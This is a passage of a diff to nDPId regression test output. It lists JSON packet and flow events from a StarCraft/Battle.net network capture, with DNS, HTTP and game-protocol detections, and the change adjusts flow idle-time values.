+00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1437389968520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968520,"pkt":"IImEa8W6hCYVPnXECABFAABdGMVAADkGNX4C5C5owKgBZAG7DaRcpvlx40yFpFAYAi2\/cgAAFQMCADCHvY3Mj+EIqhLZWr7xkOkCQpCu81AAuIN2GL29a+w7fDrgr\/wsC4qtrqrTilg07F0="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1437389968520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968520,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaEpAAIAGny3AqAFkAuQuaA2kAbvjTIWkXKb5plAUAADt2gAA"} +00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1437389968521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968521,"pkt":"IImEa8W6hCYVPnXECABFAABd0ZRAADkGfK4C5C5owKgBZAG7DaKE1LpjrjMv\/lAYAi2OuwAAFQMCADAOk8uVyOotmLX2HoTUFpC+IVWXwl6ab8qQjuO+KPoI4xJC+fUMLiJl2rPTnnO4+D0="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1437389968521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968521,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaEtAAIAGnyzAqAFkAuQuaA2iAbuuMy\/+hNS6mFAUAACPfAAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1437389968521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389968521,"pkt":"IImEa8W6hCYVPnXECABFAAAoCWgAADUGmrmtwnHgwKgBZAG7DZzPzdbBMZJpS1ARAXR77AAAAAAAAAAA"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1437389968521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968521,"pkt":"hCYVPnXEIImEa8W6CABFAAAobDdAAIAGrOnAqAFkrcJx4A2cAbsxkmlLz83WwlAQAP18YwAA"} +00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1437389968521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968521,"pkt":"IImEa8W6hCYVPnXECABFAABdqvpAADkGo0gC5C5owKgBZAG7DaNR8ZdDlhSqVFAYAi3xwAAAFQMCADAv7rGxhq2HqkFRX8I5oUWALbAWkrPmznIlHUyodNC0DL7UHLBQOucKALsB4ikroko="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1437389968521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968521,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaExAAIAGnyvAqAFkAuQuaA2jAbuWFKpUUfGXeFAUAACDRwAA"} +00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1437389968525,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968525,"pkt":"IImEa8W6hCYVPnXECABFAABd8QVAADkGXTMC5C5ywKgBZAG7DZjX42FMOcd1YVAYArORfwAAFQMCADAnMl10t6P0LqwYwp17IIJpYKwGMbTqEggZBxrTB\/KdrEJjLBHayLFZyNZHXp1TB8c="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1437389968525,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968525,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGW1AAIAG7gDAqAFkAuQucg2YAbs5x3Vh1+NhgVAUAADEjQAA"} +00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1437389968541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968541,"pkt":"IImEa8W6hCYVPnXECABFAABdD8xAADkGPncC5C5owKgBZAG7DaEXdnI2KPa\/clAYAi2WsQAAFQMCADDEyuty98HROVf0C9dCpYEUA7Jug9PX6pMmtPtLY+MIAZP0XBy+LRgi1JBN1q929Nc="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1437389968541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968541,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaE5AAIAGnynAqAFkAuQuaA2hAbso9r9yF3Zya1AUAAA60gAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1437389968610,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389968610,"pkt":"IImEa8W6hCYVPnXECABFAAAoIUtAAPIGObXHJqScwKgBZAG7DZ7bDuslZeBiaVAQFLnPdAAAAAAAAAAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1437389968610,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389968610,"pkt":"IImEa8W6hCYVPnXECABFAAAoIUxAAPIGObTHJqScwKgBZAG7DZ7bDuslZeBiaVARFLnPcwAAAAAAAAAA"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1437389970671,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389970671,"pkt":"hCYVPnXEIImEa8W6CABFAAA0DEUAAIARlo\/AqAFkrcIoFtFAAbsAIKDYDBnPzxTN69maK3zVmJ1A8q4\/WcfKtlQW"} 00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389976946,"flow_last_seen":1437389976946,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1437389976946,"l3_proto":"ip4","src_ip":"192.168.1.107","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1437389976946,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":16,"thread_ts_msec":1437389976946,"pkt":"AQBeAAAWtFJ+6zOBCABGAAAoAABAAAECQqbAqAFr4AAAFpQEAAAiAPkCAAAAAQQAAADgAAD7AQEICgBN"} @@ -128,31 +128,31 @@ 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1437389981164,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1437389981164,"pkt":"hCYVPnXEIImEa8W6CABFAAA+X2gAAIARVpTAqAFkwKgB\/s+ZADUAKjZ5W6oBAAABAAAAAAAABW55ZHVzBmJhdHRsZQNuZXQAAAEAAQ=="} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1437389981169,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1437389981169,"pkt":"IImEa8W6hCYVPnXECABFAABOAABAAEARtezAqAH+wKgBZAA1z5kAOuq0W6qBgAABAAEAAAAABW55ZHVzBmJhdHRsZQNuZXQAAAEAAcAMAAEAAQAAAAYABFDvuho="} 00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":299,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389981134,"flow_last_seen":1437389981169,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1437389981169,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"nydus.battle.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"80.239.186.26"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389981197,"flow_last_seen":1437389981197,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389981197,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1437389981197,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389981197,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EYNAAIAGHCvAqAFkUO+6Gg27AFBEOrW2AAAAAIACIAB5\/gAAAgQFtAEDAwgBAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1437389981256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389981256,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDbuOe0nfRDq1t2ASOQixoAAAAgQFtAAA"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1437389981256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389981256,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEYRAAIAGHDbAqAFkUO+6Gg27AFBEOrW3jntJ4FAQ+vAHdQAA"} -00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389981197,"flow_last_seen":1437389981265,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389981265,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/regions?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389981330,"flow_last_seen":1437389981330,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389981330,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1437389981330,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389981330,"pkt":"hCYVPnXEIImEa8W6CABFAAA0RD1AAIAG6XXAqAFkUO+6FQ28AFBBQIDMAAAAAIACIACx5gAAAgQFtAEDAwgBAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1437389981385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389981385,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGertQ77oVwKgBZABQDbzhin+3QUCAzWASOQhgoQAAAgQFtAAA"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1437389981385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389981385,"pkt":"hCYVPnXEIImEa8W6CABFAAAoRD9AAIAG6X\/AqAFkUO+6FQ28AFBBQIDN4Yp\/uFAQ+vC2dQAA"} -00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389981330,"flow_last_seen":1437389981385,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1437389981385,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/regionsxml\/regions.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982130,"flow_last_seen":1437389982130,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389982130,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1437389982130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389982130,"pkt":"hCYVPnXEIImEa8W6CABFAAA0Zr9AAIAGfH3AqAFk1fh\/gg29BF8F03V0AAAAAIACgABKLQAAAgQFtAEDAwABAQQC"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982140,"flow_last_seen":1437389982140,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389982140,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1437389982140,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389982140,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EY9AAIAGHB\/AqAFkUO+6Gg2+AFAFq5RDAAAAAIACIADZ\/QAAAgQFtAEDAwgBAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1437389982182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389982182,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADIGMUXV+H+CwKgBZARfDb3bZ8BEBdN1dWASFtBArgAAAgQFtAAA"} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1437389982183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389982183,"pkt":"hCYVPnXEIImEa8W6CABFAAAoZsBAAIAGfIjAqAFk1fh\/gg29BF8F03V122fARVAQgADvOgAA"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1437389982197,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389982197,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDb7iEHr2BauURGASOQiM8wAAAgQFtAAA"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1437389982197,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389982197,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEZBAAIAGHCrAqAFkUO+6Gg2+AFAFq5RE4hB691AQ+vDixwAA"} -00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982140,"flow_last_seen":1437389982207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389982207,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/alert?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":332,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982269,"flow_last_seen":1437389982269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389982269,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1437389982269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389982269,"pkt":"hCYVPnXEIImEa8W6CABFAAA0RElAAIAG6WnAqAFkUO+6FQ2\/AFB8c4vnAAAAAIACIABrlQAAAgQFtAEDAwgBAQQC"} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982130,"flow_last_seen":1437389982277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1437389982277,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Starcraft","breed":"Fun","category":"Game"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1437389982326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389982326,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGertQ77oVwKgBZABQDb8Q\/FwJfHOL6GASOQgOjQAAAgQFtAAA"} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1437389982327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389982327,"pkt":"hCYVPnXEIImEa8W6CABFAAAoREtAAIAG6XPAqAFkUO+6FQ2\/AFB8c4voEPxcClAQ+vBkYQAA"} -00814{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982269,"flow_last_seen":1437389982327,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1437389982327,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/alert\/en-gb","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389981197,"flow_last_seen":1437389981197,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389981197,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 